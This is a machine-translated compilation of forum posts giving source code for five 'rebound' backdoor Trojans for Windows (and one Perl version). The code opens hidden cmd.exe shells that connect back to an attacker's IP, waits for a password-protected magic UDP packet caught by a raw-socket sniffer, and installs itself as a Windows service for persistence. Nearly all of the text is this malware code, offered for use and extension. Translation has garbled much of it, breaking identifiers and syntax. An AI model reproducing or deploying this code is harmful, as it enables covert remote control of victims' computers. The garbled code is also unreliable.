The first rebound Trojan code: author ityblood
Code
#include
The test results are as follows:
The county is a bit simple, but it can still be paying attention to. . If you need to write a LKM, huh, huh.
Second rebound Trojan code: Author CNHACKTNT
Code
#! / usr / bin / perl # http://www.s8s8.net#cnhackt [at] hotmail.comuse strict; user socket; use cwd; use ie :: handle; if (@argv <1) {print < <"Eof"; USAGE: NC -P port (Default 66666) On Your Local System First, Thenperl $ 0 Remote IP
The SQL brother's C version is similar.
Test screenshot:
Third rebound
Tip
Code
Author Dahubaobao
Code
#include
While (true) {wsadata wsadata; bool threadflag = false; dword threadid = 0; int nret = 0; NRET = WSASTARTUP (MakeWord (2, 2), & WSADATA); // Initialization IF (NRET) {#ifdef debugmsg Printf ("WSASTARTUP () error:% d / n", nret); #ndif return 0;} SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (Sock == Invalid_socket) {#ifdef debugmsg printf ("socket () GetLasterror Reports% D / N ", wsaerron); #ndif goto clean;} nret = connect (Sock, Struct SockAddr *) & sai, sizeof (struct socketdr)); if (nret! = Socket_error) {nret = send (SOCK , Banner, Sizeof (Banner), 0); if (nret == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, "send () getLastError REPORTS% D / N", WSAERRON); Send (Sock, MsgerRror, Sizeof (Msgerror), 0); #ENDIF Goto Clean;} While (True) {nret = Send (Sock, Passbanner, Sizeof (PASSBANER), 0); if (nret == Socket_ERROR) {# # IFDef Debugmsg Sprintf (MsgerRror, "Send () getLastError Reports% D / N", WSAERRON); Send (Sock, MsgerRror, SizeOf (MsgerRror), 0); #ENDIF GOTO CLEAN;} nret =
RECV (Sock, Passbuf, SizeOf (Passbuf) -1,0); IF (StrnicMP (PASSBUF, Userpass, Strlen (Userpass) == 0) {#ifdef debugmsg send (Sock, Passusuccess, Sizeof (PasssuCcess), 0) #Ndif threadflag = true; Break;} else {#ifdef debugmsg send (Sock, Passerror, Sizeof (Passerror), 0); #ENDIF Continue;} if (nret == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, " Recv () getLastError REPORTS% D / N ", WSAERRON); Send (Sock, Msgerror, SizeOf (MsgerRror), 0); #ENDIF GOTO CLEAN;} Sleep (100);} if (threadflag) {// ExeBackmain (SOCK); CreateThread (Null, 0, (LPTHREAD_START_ROUTINE) EXEBACKMAIN, (LPVOID) SOCK, 0, & ThreadID);}} Sleep (1000);} Clean: IF (sock = NULL!) closesocket (sock); WSACleanup (); return 0;} VOID WINAPI EXEBackMain (LPVOID s) // BOOL EXEBackMain (SOCKET sock) {SOCKET sock = (SOCKET) s; STARTUPINFO si; PROCESS_INFORMATION pi; HANDLE Hread = null, hwrite = null; tchar cmdsign [] = "/ ndahubaobao: //>"
While (TRUE) = {0}; // Error message buffer TCHAR CMDLINE [300] = {0}; // command line buffer TCHAR Recvbuf [1024] = {0}; // Receive buffer Tchar sendBuf [2048] = {0}; // transmit buffer SECURITY_ATTRIBUTES sa; DWORD bytesRead = 0; int ret = 0; sa.nLength = sizeof (SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; // Create Anonymous Pipe IF (! CreatePipe (& Hread, & Hwrite, & Sa, 0)) {#ifdef debugmsg sprintf (msgerror, "createpipe () getLastError Reports% D / N", Erron); Send (Sock, Msgerror, Sizeof (Msgerror), 0); #ndif goto clean;} Si.cb = sizeof (startupinfo); getStartupinfo (& Si); si.hstdrror = hwrite; si.hstdoutput = hwrite; // process (cmd) Output write pipe Si.WSHOWINDOW = Sw_hide; si.dwflags = startf_useshowWindow | Startf_usestdhandles; GE TsystemDirectory (cmdline, sizeof (cmdline)); // Get system directory strcat (cmdline, "// cmd.exe / c"); // Splicing cmd Ret = Send (Sock, cmdsign, sizeof (cmdsign), 0); / / To the target send a prompt if (RET == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, "send () getLastError Reports% D / N", WSAERRON); Send (Sock, MsgerRror, Sizeof (MsgerRr), 0) #Ndif goto clean;} RET = Recv (Sock, Recvbuf, SizeOf (Recvbuf), 0); // Receive Target Data // If EXIT or Quit,
Exit IF (strnicmp (Recvbuf, "exit", 4) == 0 || Strnicmp (Recvbuf, "Quit", 4) == 0) {#ifdef debugmsg send (sock, byebye, sizeof (byebye), 0) #Ndif goto clean;} // Indicates that the other party has disconnected if (Ret == Socket_ERROR) {#ifdef debugmsg sprintf (msgerror, "RECV () getLastError Reports% D / N", WSAERRON); Send (Sock, MsgerRor, Sizeof (msgerror), 0); #ENDIF goto clean;} // indicates receiving data error IF (RET <= 0) {#ifdef debugmsg sprintf (msgerror, "RECV () getLastError REPORTS% D / N", wsaerron); Send (Sock, Msgerrror, Sizeof (MsgerRror), 0); #ENDIF Continue;} Sleep (100); // Take a break, you can do not strncat (cmdline, recvbuf, sizeof (recvbuf)); // stitching a complete The cmd command // creates a process, that is, executes the CMD command if (! CREATEPROCESS NULL, CMDLINE, NULL, NULL, TRUE, NULL, NULL, NULL, & SI, & PI) {#ifdef Debugmsg Sprintf (MsgerRror, "CreateProcess () getLastError Reports% D / N", Erron); Send (Sock, Msgerror, Sizeof (msgerrror), 0); #ENDIF continue;} closehandle (hwrite); while (true) {// Unlimited loop read the data in the pipe until no data is not (ReadFile (HREAD, SENDBUF, SIZEOF) Sendbuf, & Bytesread, NULL) == 0) Break; Send (SOCK, SENDBUF, BYTESREAD, 0);
// Send out MEMSET (SendBuf, 0, SIZEOF (Sendbuf)); // Buffet Qing Sleep (100); // Take a break}} clean: // Release the handle IF (HREAD! = Null) CloseHandle (HREAD); IF (hwrite! = null) CloseHandle (hwrite); // Release Socket if (Sock! = null) CloseSocket; wsacleanup (); exitthread (0); // return 0;} Fourth rebound Trojan code: Author ZV is relatively complete .for Winnt's .Compiler by VC 6.0. I divide the latter into four parts, one part count as a module, first is part of the main function entry into part, will add some parameter settings, initialization, hidden processes Wait, all completed in this main function, now there is no, less code .. Code
#include "mainheader.h" Mainparameterstk mpstk = {"zvrop", "www.s8s8.net"}; // Print help void usage (char szhelp [= ""; fprintf (stderr, "% S usage:% s / n ", programname, szhelp;} // Initialization parameter int HandleOptions (int Argc, char * argv []) {INT I, RN = 1; for (i = 1; I
This mgotostart (); is the beginning of Sniffer, that is, our second part, sniffing part, I wrote three packets, UDP, TCP, ICMP sniffing, in fact, the TCP can be used very little ( Unless you use some bags
Software Direct TCP package) So I use UDP and ICMP when I test,
code show as below:
Code
#include "mainheader.h" #define MAX_PACK_LEN 65535 #define SIO_RCVALL _WSAIOW (IOC_VENDOR, 1) SNIFFERDATASTK sfStk; // correctness of the packet is determined int ChkBuff (char * msg, int msglen) {int i1 = strlen (mpStk.KeyData ), I2 = strlen (mpstk.szuserPasd); if (Strnicmp (MSG, MPSTK.KeyData, I1) == 0) {char * fp = & msg [i1 1]; if (2! = getcmdline (fp, (char *) (& sfstk), 100, 3)) {RETURN 0;} if (! chkpass (sfstk.name)) {return 0;} return 1;} return 0;} // data packet dispensing int decodepack (char * buf, int buflen) {IP_HEADER * pIpheader; int iProtocol; pIpheader = (IP_HEADER *) buf; iProtocol = pIpheader-> proto; int iIphLen = sizeof (unsigned long) * (pIpheader-> h_lenver & 0xf); int PackSize = 0 ; switch (iProtocol) {case IPPROTO_UDP: PackSize = sizeof (UDP_HEADER); break; case IPPROTO_ICMP: PackSize = sizeof (UDP_HEADER); break; case IPPROTO_TCP: PackSize = sizeof (TCP_HEADER); default: retur N 0;}} (buflen-iiphlen-packsize) <(MPSTK.KeyData 10)) RETURN 0; if (CHKBUFF (BUF iiphlen packsize) Return 1 ; return 0;} // cycle received packet int RecvRightData (SOCKET Sock) {char recvBuf [MAX_PACK_LEN]; int RecvDataLen; while (true) {memset (recvBuf, 0, MAX_PACK_LEN); RecvDataLen = recv (Sock, recvBuf, MAX_PACK_LEN , 0); if (socket_error == recvdatalen || recvdatalen <46) Return 0; IF (Decode 1;}} Return 0;} // Get native external iPunsigned long msgetipBystrout () { CHAR IN [20] = "", OUT [20] =
""; If (msgetip (in, out) {return inet_addr (out);} else {return inet_addr ("127.0.0.1");}} // set network environment, start sniffing int start_sniffer (socket snfsock) { SOCKADDR_IN addr_in; addr_in.sin_family = AF_INET; addr_in.sin_port = INADDR_ANY; addr_in.sin_addr.S_un.S_addr = msGetipByStrOUT (); if (SOCKET_ERROR == bind (SnfSock, (struct sockaddr *) & addr_in, sizeof (addr_in))) { ConCloseSocket (& SnfSock); return 0;} DWORD dwBufferLen [10]; DWORD dwBufferInLen = 1; DWORD dwBytesReturned = 0; if (SOCKET_ERROR == WSAIoctl (SnfSock, SIO_RCVALL, & dwBufferInLen, sizeof (dwBufferInLen), & dwBufferLen, sizeof (dwBufferLen), & dwbytesReturned, NULL, NULL) {ConcloseSocket (& Snfsock); Return 0;} Return 1;} // Network Start Function Extern DWORD WINAPI USERTHREADFUNC (LPVOID LPPARAM); int ListenUserMain (void) {SOCKET SnfSock; if (! SetSocketHand (& SnfSock, SOCK_RAW)) {return 0; (! Start_Sniffer (SnfSock))} if {return 0; (! RecvRightData (SnfSock))} if {ConCloseSocket (& SnfSock) ; return 0;} ConCloseSocket (& SnfSock); if (SetSocketHand (& SnfSock, SOCK_STREAM)!) {return 0;} if (! ContoReServer (& SnfSock, (unsigned short) atoi (sfStk.nPort), sfStk.szIp)) {ConCloseSocket (& SnfSock); Return 0;}}} {return 0;} Return 1;} The above section, except that the useerthreadfunc function is external, others are internal, and the sniffing is realized.
The userThreadFunc function is the user thread function. It has been connected to the user, and the user has been connected. The following is the code of interactive shell. As follows:
Code
#include "mainheader.h" // Turn off the CMD process to prevent users from disconnecting the connection void closecmd (userContstk * SCK) {if (SCK-> procinfo.hprocess! = null) {TerminateProcess (SCK-> procinfo.hprocess, - 9); ConcloseHandle (& SCK-> Procinfo.hprocess);}} // End interactive thread B, close the corresponding resource void killthreadhdb (userContstowstk * SCK) {if (SCK-> UserThreadHDB! = Null) {TerminateThread (SCK-> UserThreadHdB, 0); ConCloseHandle (& sck-> UserThreadHdB); ConCloseHandle (& sck-> hReadPipe); ConCloseHandle (& sck-> hReadFile); ConCloseHandle (& sck-> hWriteFile); ConCloseHandle (& sck-> hWritePipe); xfree (sck-> BUFF);}} // End CMD interaction, and interrupt VOID QuittelCon (SCK-> getcmd == 1) {killthreadHDB (SCK); CloseCMD (SCK); SCK-> getcmd = 0; } Rnvcsemsg (SCK-> Usersck, "Bye ~ ^ _ ^ ~ / R / R"); SCK-> EXITIN = 1;} // End CMD interaction, return to the back door shell under Void BackTocon (UserContstowstk * SCK) {KillthreadHDB ( SCK); RNVCASEMSG (SCK-> Usersck, "==================================== / R / n" "S8S8 //>"); SCK-> getcmd = 0;} // Interactive thread B, get C md output is sent to the UE DWORD WINAPI ThreadFuncB (LPVOID lpParam) {# define MAX_BUFF_TB 4096 USERCONTSTK * ThreadST = (USERCONTSTK *) lpParam; ThreadST-> buff = (char *) malloc (MAX_BUFF_TB * sizeof (char)); if ( ThreadST-> buff == NULL) return 0; ThreadST-> Bann = 1; unsigned long howlong; DWORD rest; while (true) {rest = ReadFile (ThreadST-> hReadFile, ThreadST-> buff, MAX_BUFF_TB, & howlong, NULL) ; If (REST <= 0) {Xfree (Threadst-> BUFF);
Return 0;} send (threadst-> buff, howlong, 0);} return 0;} // generate and bundled a cmdshell.short getContel (userContstk * SCK) {if (SCK-> getcmd == 1) {return 0;} memset (& sck-> pipeattrA, 0, sizeof (sck-> pipeattrA)); sck-> pipeattrA.nLength = sizeof (SECURITY_ATTRIBUTES); sck-> pipeattrA.lpSecurityDescriptor = NULL; sck-> pipeattrA .binherithandle = true; if (! createpipe (& SCK-> Hreadpipe, & SCK-> HWRITEFILE, & SCK-> PiPEATTRA, 0) {RNVERRORID (SCK-> Usersck, "CreatePipe:"); Return 0;} MEMSET (& SCK- > pipeattrB, 0, sizeof (sck-> pipeattrB)); sck-> pipeattrB.nLength = sizeof (SECURITY_ATTRIBUTES); sck-> pipeattrB.lpSecurityDescriptor = NULL; sck-> pipeattrB.bInheritHandle = TRUE;! if (CreatePipe (& sck -> Hreadfile, & Sck-> HWRITEPIPE, & SCK-> PIPEATTTRB, 0) {RNVERRORID (SCK-> Usersck, "CreatePipe:"); ConcloseHandle (& SCK-> HREADPIPE); ConcloseHandle (& SCK-> hwritefile); Return 0; } DWORD USERTHREADIDB; SCK-> BANN = 0; IF ((SCK-> USE) rThreadHdB = CreateThread (NULL, 0, ThreadFuncB, (LPVOID *) sck, 0, & UserThreadIdB)) == 0) {rnvErrorID (sck-> UserSck, "CreateThreadB:"); ConCloseHandle (& sck-> hReadPipe); ConCloseHandle (& sck -> hWriteFile); ConCloseHandle (& sck-> hReadFile); ConCloseHandle (& sck-> hWritePipe); return 0;} STARTUPINFO starinfo; GetStartupInfo (& starinfo); starinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; starinfo.hStdInput = sck-> hReadPipe;
starinfo.hStdError = starinfo.hStdOutput = sck-> hWritePipe; starinfo.wShowWindow = SW_HIDE; char Cmdpath [MAX_PATH 20] = ""; char ConSystemPath [MAX_PATH] = ""; DWORD ren = GetSystemDirectory (ConSystemPath, MAX_PATH); if (Ren! = Strlen)) {rnverrorid (SCK-> UserSck, "GetSystemDirectory:"); KillThreadHDB (SCK); Return 0;} sprintf (cmdpath, "% s // cmd.exe", consYStempath; if (CreateProcess (cmdpath, null, null, null, true, 0, null, null, & starinfo, & SCK-> procinfo) == 0) {RNVERRORID (SCK-> UserSck, "CreateProcess:"); KillThreadHDB (SCK); Return 0;} sprintf (cmdpath, "======================== / r / n" "= threadid =% ld / r / n" "= Processid =% ld / r / n "" ========================= / r / n / 0 ", userThreadIDB, SCK-> procinfo.dwprocessid ); RNVCASEMSG (SCK-> Usersck, cmdpath); // If you create a thread B timeout, exit short _timeout = 0; while (SCK-> Bann == 0) {if (_timeout > 50) { RnVERRORID (SCK-> UserSck, "Timeout"); CloseCMD (SCK); KillThreadHDB (SCK); Return 0;} Sleep (50);} // Set to have obtained cmdshell SCK-> getCmd = 1; return 1;} // Output Bannervoid TypeHelp {RNVCASEMSG (SCK-> Usersck, "/ R / N
/ R / N "" Quit EXIT / R / N "" Help
cmd shell / r / n "" / R / N ");} // Command Line Analysis Void WinAPI Gocommand (UserContstk * SCK CHAR * COMM) {Condel1013 (COMM); char cmdline [10] [256] = {"}; int coomline_num = getcmdline (comm, & cmdline [0) [0], 256, 10) 1; IF (strcmpi (cmdline [0], "" ") == 0) {return;} cmdline [0] [0] = TouPper (cmdline [0] [0]); switch (cMDline [0] [0]) {case 'q ': {IF (CMDline [0], "Q") == 0) || (strcmpi (cmdline [0], "quit") == 0) && comline_num == 1) quittelcon (SCK); Else goto nocommand; break;} case 's': {IF ((strcmpi (cmdline [0], "s") == 0) || (strcmpi (cmdline [0], "shell") == 0) && comline_num == 1) getConsel (SCK); Else Goto Nocommand; Break;} Case '?': Case 'h'
: {IF ((strcmpi (cmdline [0], "h") == 0 || Strcmpi (cmdline [0], "help") == 0 || Strcmpi (cmdline [0], "?") == 0) TYPEHELP (SCK); Else Goto Nocommand; Break;} Default: Nocommand: RnvcaSemmsg (SCK-> Usersck, "Bad Command! / R / N");}} // Interactive thread A, can be used as the back door itself Shell, can also be used as cmdshell's input void beginshell (userContstk * SCK) {charff [1024] = {0}, buf [1024] = {0}; long howlong; dword Nothing; RnvccAsemsg (SCK-> Usersck, " / R / N "" Easy Backdoor / R / N "" CODER BY ZV (ZVROP@163.com) / R / N "" Site http://www.s8s8.net/r/N "" / R / N "" S8S8 //> "); While (True) {MEMSET (BUF, 0, 1024); Howlong = Recv (SCK-> Usersck, BUF, 1023 - Strlen (BUFF), 0); IF (Howlong <= 0) {Quittelcon (SCK); Return;} strncat (buff, buf, howlong); if (buf [howlong-1] == '/ n') {if (SCK-> getcmd! = 0) {if (buff [0] == '`' ) {Gocommand (SCK, BUFF 1);} else {Writefile (SCK->
HWriteFile, Buff, Strlen (BUFF), & Nothing, NULL; if (! Strnicmp (BUFF, "EXIT", 4)) Backtocon (SCK);}} else {Gocommand (SCK, BUFF); if (SCK-> EXITIN == 1) {RETURN;} RNVCASEMSG (SCK-> UserSck, "S8S8 //>");} Memset (BUFF, 0, 1024); IF (SCK-> EXITIN == 1) {Return;}}}} // User interface entry, apply for a structure to save, is to compatibility with multiple users DWORD WINAPI USERTHREADFUNC (LPVOID LPPARAM) {UserContstStk * SCK = (UserContstk *); if (SCK == Null) { Rnverrorid (* (socket *) LPPARAM, "Malloc:"); contsesocket ((socket *) lpparam; return 0;} Memset (SCK, 0, SIZEOF (UserContstk)); SCK-> Usersck = * (socket *) LPParam; Beginshell (SCK); ConcloseSocket; Free (SCK); Return 1;} The last part is a public function section, providing some of the packages of the function. As follows:
Code
#include "mainheader.h" #define max_timeout 20000 // Close Socket Handle Void ConcloseSocket (Socket * Sock) {if (* Sock == 0 || * SOCK == Socket_ERROR) Return; CloseSocket (* Sock); * SOCK = 0;} // Close handle void contoseHandle (Handle * Hand) {if (* hand == null || * hand == invalid_handle_value) return; closehandle (* hand); * hand = null;} // Release memory void xfree (CHAR * BF) {IF (bf == null || bf == 0) Return; Free (bf); bf = null;} // Setting monitor INT Locallisten (Socket Sock) {IF (Listen (Sock, 5) == SOCKET_ERROR) return 0; return 1;} // connect to a remote server int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr) {struct sockaddr_in server_addr; server_addr.sin_family = AF_INET; server_addr.sin_port = htons (port) ; struct hostent * server_host; server_host = gethostbyname (reAddr); if (server_host == NULL) return 0; memcpy ((void *) & server_addr.sin_addr, (void *) server_host-> h_addr, server_host-> h_length); int len = SIZEOF (Server_ADDR); if (Con NECT (* Sock, (Struct SockAddr *) & Server_addr, len) <0) Return 0; Return 1;} // Apply for Network Environment INT SetSocketDLL (Void) {Wsadata Wsadata; if (Socket_ERROR == WSAStartup (Makeword (2, 2 ), & wsadata)) {RETURN 0;} Return 1;} // Apply Connection Handle Int setSocketHand (SOCKET * SOCK, DWORD SOCKTYPE) {* SOCK = Socket (AF_INET, SOCKTYPE, IPPROTO_IP); if (* Sock == Socket_ERROR) RETURN 0; RETURN 1;} // Send messages to user-end Void Rnvcasemsg (STRLEN (MSG) <= 0) Return; Send (SOCK, MSG, Strlen (MSG), 0) ;
} // Send a message with an error code to the user-end void Rnverror (Socket Sock, Char * MSG) {char RMSG [256] = {"}; sprintf (rmsg," / r / nerror> S:% D / R / N ", MSG, getLastError ()); RNVCASEMSG (SOCK, RMSG);} // Compatible with NC and TelnetVoid Condel1013 (CHAR * STR) {for (unsigned INT I = 0; I
h_addr_list [i], sizeof (addr)); if (addr.s_un.s_un_b.s_b1 == 192 && addr.s_un.s_un_b.s_b2 == 168) {IF (Strlen) == 0) {STRCPY (IPIN ,}} else if (addr.s_un.s_un_b.s_b1 == 172 && (addr.s_un.s_un_b.s_b2> = 16 && addr.s_un.s_un_b.s_b2 <= 131)) {IF ( Strlen (ipin) == 0) {structure (ipIN, inet_ntoa (addr));}}} else f (addr.s_un.s_un_b.s_b1 == 10) {IF (Strlen) == 0) {STRCPY (ipin , INET_NTOA (AddR));}} else {IF (Strlen (iPout) == 0) {structure (iPout, INETOA (ADDR));}}} i ;} if (Strlen) == 0) {structure Ipout, ipin);} IF (IPIN) == 0) {structure (ipIN, IPOUT);} Return 1;} return 0;} It is also to come one is the header file of the program: as follows:
Code
#include
USHORT i_seq; ULONG timestamp;} ICMP_HEADER; fame // variables and functions extern MAINPARAMETERSTK mpStk; extern void ConCloseSocket (SOCKET * Sock); extern int LocalListen (SOCKET Sock); extern int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr); extern int SetSocketDll (void); extern int SetSocketHand (SOCKET * Sock, DWORD sOCKTYPE); extern void rnvCasemsg (SOCKET Sock, char * msg); extern void rnvErrorID (SOCKET Sock, char * msg); extern void Condel1013 (Char * STR); Extern Short Chkpass; Extern Short Getcmdline (Char * Comm, Char * CMDline, Short Cont, Short Num); Extern Int Msgetip (Char * ipin, char * iPout); Extern Void ConcloseHandle (Handle * Hand); Extern Void Xfree (Char * BF); all public functions are here.
Remnant:
So much
The code is because I like a relatively stable program, the size is not a problem, the above program should be a very stable back door frame (because only the socket 1.0 function is written), including the user shell and the Sniffer connection section, the user can unlimited number of times Disconnect, repeat the connection, generate shells and exit, and do not cause a problem of handle and memory.
In addition, I just saw it.
Code, I don't need to use something still, probably to upgrade and expand convenience, and many places have left the interface, I have time I will send a streamlined
Code. ^
_ ^.
The following is a picture of compiling a good test:
The host is 192.168.1.2, the target machine is 192.168.1.3, the unit monitor port 8888, the default packet mark is "www.s8s8.net",
The password is "ZVROP".
Sending a packet is to send UDP data with VC-U, and the content in C: /X.txt is:
Code
Www.s8s8.net ZVROP 192.168.1.2 8888
The packet mark,
Password, reverse connection IP, reverse connection port, intermediate space-opened
Note that the order is not reversed.
Fifth rebound
Tip
Code
Author weibo
Code
Headerf.h puts public functions, and some statements #1ndef _bdh_ # define _bdh_ # include
Trojan process.
Launched for UDP analysis
Trojans have not perfect. It is just very simple. . . Wait for everyone to add. .
It is best to analyze UDP to extract the content. Judgment user name.
password. Then start
Trojan process
Sniffer.cpp
Code
#include "headerf.h" // ----------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- CHAR RCVBUF [65535]; SOCKADDR_IN Sisource; Extern socket resock; char SourceIpaddr [16]; unsigned short sourceport; Bool CANCON = true; char WelcomeBuff [200] = " / R / N "" EasyService Backdoor / R / N " " CODER by weibo (wbwap@sina.com) / r / n" " Site http://www.s8s8.net/r/n" / R / N "; // --------------------- -------- Void DecodeipPack (Char * BUF, INT IREC); Void DecodeudPck (Char * BUF, Unsigned Int Buffle); int msgetip (char * ipin, char * iPout); Void StartBackDoor (socket * sock, Char * ipaddr); // ---------------------------- int startsniffer () {socket sniffsock; struct sockaddr_in addr; unsigned Char localname [256]; intec; dword dwbufferlen [10]; dword dwbufferinlen = 1; dword dwbytesreturned = 0; char IN [20] = "", OUT [20] = " "; StartWSA (); SniffSock = socket (AF_INET, SOCK_RAW, IPPROTO_IP); setsockopt (SniffSock, SOL_SOCKET, SO_RCVTIMEO, (char *) & ntime, sizeof (ntime)); addr.sin_family = AF_INET; addr.sin_port = INADDR_ANY; msGetip (in, out); addr.sin_addr.s_un.s_addr = inet_addr (out); bind (Sniffsock, (PsockAddr) &
addr, sizeof (addr)); WSAIoctl (SniffSock, SIO_RCVALL, & dwBufferInLen, sizeof (dwBufferInLen), & dwBufferLen, sizeof (dwBufferLen), & dwBytesReturned, NULL, NULL); while (1) {memset (rcvbuf, 0, sizeof (rcvbuf) ); REC = Recv (Sniffsock, RCVBUF, SIZEOF (RCVBUF), 0); DecodeipPack (RCVBUF, REC);}} // --------------------- -------------------------------------------------- ---- void DecodeIpPack (char * buf, int irec) {int iproto; int iIphlen; IP_HEADER * pIPheader; pIPheader = (IP_HEADER *) buf; iproto = pIPheader-> proto; iIphlen = sizeof (unsigned long) * (pIPheader -> h_lenver & 0xf); if (iProto == ipproto_udp) {sisource.sin_addr.s_addr = pipheader-> sourceip; strncpy (SourceIpAddr, INET_NTOA (SiSource.sin_addr), 16); // Printf ("Package type:% s / N Source IP:% S "," UDP ", SourceIpAddr; DecodeudPPack (BUF iiphlen, IREC);}} void decodeudpck (char * buf, unsigned int buflen) { Char Str [10]; udp_header * pudpheader; pudpheader = (udp_header *) BUF; sisource.sin_port = pudpheader-> uh_sport; sourceport = ntohs (sisource.sin_port); // This place is to determine whether to start the process! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! // This is the process of moving the Trojan in the 塬 port is 9876. . Connecting to your 1234 fracture These can be changed // The best way is the Decode UDP package. . Then analyze the content. . . Judgment whether to open Trojans. . . . //Time is running out. . . .
IF (can) {if (SourcePort == 9876) {StartBackDoor (& Resock, SourceIpAddr);} can = false;}} int msgetip (char * ipin, char * iPout) {char chostname [80] = "; if (gethostname (chostname, 80)) == Socket_
Error) Return False; struct hostent * host = gethostbyname (chOSTNAME); if (null! = Host) {Struct in
_
Addr; int i = 0; while (host-> h
_
AddR
_
List [i]! = null) {memcpy (& addr, host-> h
_
AddR
_
List [i], sizeof (addr)); if (addr.s
_
Un.n
_
Un
_
B.S
_
B1 == 192 && addr.s
_
Un.n
_
Un
_
B.S
_
B2 == 168) {IF (Strlen) == 0) {STRCPY (ipin, inet
_
NTOA (AddR));}} else if (addr.s
_
Un.s
_
Un
_
B.S
_
B1 == 172 && (addr.s
_
Un.s
_
Un
_
B.S
_
B2> = 16 && addr.s
_
Un.s
_
Un
_
B.S
_
B2 <= 131)) {IF (Strlen) == 0) {STRCPY (ipin, inet
_
NTOA (AddR));}} else if (addr.s
_
Un.s
_
Un
_
B.S
_
B1 == 10) {IF (Strlen) == 0) {STRCPY (ipin, inet
_
NTOA (AddR));}} else {IF (Strlen (iPout) == 0) {STRCPY (iPout, Inet
_
NTOA (AddR);}} i ;} if (Strlen (iPout) == 0) {strun (iPout, ipin);} if (ipIN) == 0) {strcpy (ipIN, IPOUT);} Return 1;} return 0;} void startbackdoor (socket * sock, char * ipaddr) {int REC; // startwsa (); setSocketHandle (SOCK); REC = ContareServer (SOCK, 1234, IPADDR); RETURNMESSAGE (SOCK, WELCOMEBUFF) CreatePiPeinsock (); Switch (REC) {Case 0: CloseSocket (resock); cancon = true; break; cas 1: cancon = false; break;}} This is
The main body of the service. . . . . . .
There is also an automatic addition to
The function of the service. . . No time, I will go right away. Pack the thing. . ~~~~ ZV to write. . . .
You can use createService () functions. .
Serving this piece requires everyone to improve ~~
Con.cpp
Code
#include "headerf.h" // ----------------------------------------- ---------------------------------- Startupinfo Si; Process_information PI; Socket Resock; // ----- -------------------------------------------------- ----- void StartWSA () {WSADATA wsa; WSAStartup (MAKEWORD (2,2), & wsa);} int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr) {int namelen; struct sockaddr_in server_addr; server_addr .sin_family = AF_INET; server_addr.sin_port = htons (port); server_addr.sin_addr.S_un.S_addr = inet_addr (reAddr); namelen = sizeof (server_addr); if (connect (* sock, (SOCKADDR *) & server_addr, namelen) < 0) RETURN 0; RETURN 1;} int setsocketHandle (Socket * Sock) {* sock = wsasocket (pf_inet, sock_stream, ipproto_tcp, null, 0, 0); if (* sock == Socket_ERROR) RETURN 0; RETURN 1;} Void ReturnMessage (Socket * Sock, Char * MSG) {IF (Strlen (MSG) <= 0) Return; Send (* Sock, MSG, Strlen (MSG), 0);} // This is the re-order SI Resock .... is equal to a simple pipe. . // Not too much time. In order to save things. . It is best to achieve CMD.// to be rewritten into pipe CREATEPIPE () .. // This can analyze the data. . To add other controls. . . . . . void CreatePipeInSock () {memset (& si, 0, sizeof (si)); si.cb = sizeof (si); si.dwFlags = STARTF_USESHOWWINDOW STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = si.hStdOutput = si. HSTDERROR = (void *) Resock; CreateProcess (Null, "Cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, & SI, & PI);} backdoor.cpp
Code
#include "headerf.h" // ----------------------------------------- ---------------------------------- Const int c_neventct = 3; const Int c_neventindexpause = 0; const Int c_neventindexContinue = 1; const int c_nEventIndexStop = 2; HANDLE g_arEventControl [c_nEventCt]; SERVICE_STATUS_HANDLE g_ssh; DWORD g_dwStatus = SERVICE_STOPPED; #pragma argsused // service status to SCMvoid SetStatus (DWORD dwStatus) {SERVICE_STATUS ss = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP, NO_ERROR , 0, 1, 5000}; ss.dwCurrentState = dwStatus; SetServiceStatus (g_ssh, & ss); g_dwStatus = dwStatus;} // command processing VOID __stdcall Handler (DWORD dwCtl) {switch (dwCtl) {case SERVICE_CONTROL_STOP: WSACleanup ();break; default: // nomal break;}} bool HandleControl () {bool bContinueRunning (true); DWORD dwWait = WaitForMultipleObjects (c_nEventCt, g_arEventControl, FALSE, 0); int nIndex = dwWait - WAIT_OBJECT_0; if (nIndex> = 0 && NINDEX switch (nIndex) {case c_nEventIndexPause: SetStatus (SERVICE_PAUSED); break; case c_nEventIndexContinue: SetStatus (SERVICE_RUNNING); break; case c_nEventIndexStop: SetStatus (SERVICE_STOP_PENDING); bContinueRunning = false; break;}} return (bContinueRunning);} VOID __stdcall ServiceMain (DWORD dwArgc, LPSTR * lpszArgv) {g_arEventControl [c_nEventIndexPause] = CreateEvent (NULL, TRUE, FALSE, NULL); g_arEventControl [c_nEventIndexContinue] = CreateEvent (NULL, TRUE, FALSE, NULL); g_arEventControl [c_nEventIndexStop] = CreateEvent (NULL, True, false, null; g_ssh = registerServiceCtrlHandler (LPSZARGV [0], Handler); setStatus (service_start_pending); setStatus (Servi CE_RUNNING); while (HandleControl ()) {if (g_dwStatus == SERVICE_RUNNING) {StartSniffer ();}} for (int nEvent = 0; nEvent CONEVENT ", servicemain}, {null, null}}; startServiceCtrldispatcher (ARSVC); Return 0;} Manual plus service After compiling Enter CMD Run SC CREATE Casual A Name BinPath = PATH Example: Sc Create Backdoor BinPath = C: /BackDoor.exe This is very grass. . . . . . Waiting for me to spend military training. Have time. . Come back to write ~~~~ 88 Attachment is written in BCB6. . .
